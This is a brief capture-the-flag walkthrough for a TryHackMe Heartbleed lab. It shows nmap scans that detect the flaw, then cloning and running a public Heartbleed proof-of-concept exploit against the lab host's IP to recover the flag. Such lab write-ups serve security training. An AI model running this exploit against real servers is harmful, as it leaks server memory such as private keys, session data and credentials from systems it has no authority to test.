HeartBleed
Room Link: https://tryhackme.com/room/heartbleed
Initial Scan
Kali
nmap -A $VICTIM
TCP/443 - HTTPS
We can see the site is vulnerable to heartbleed
Kali
nmap -p 443 --script ssl-heartbleed $VICTIM
I had to run the exploit a couple times but eventually I found some interesting info. Most importantly the flag.
Kali
git clone https://github.com/mpgn/heartbleed-PoC.git
cd heartbleed-PoC/
python2.7 heartbleed-exploit.py 34.240.174.225
Last updated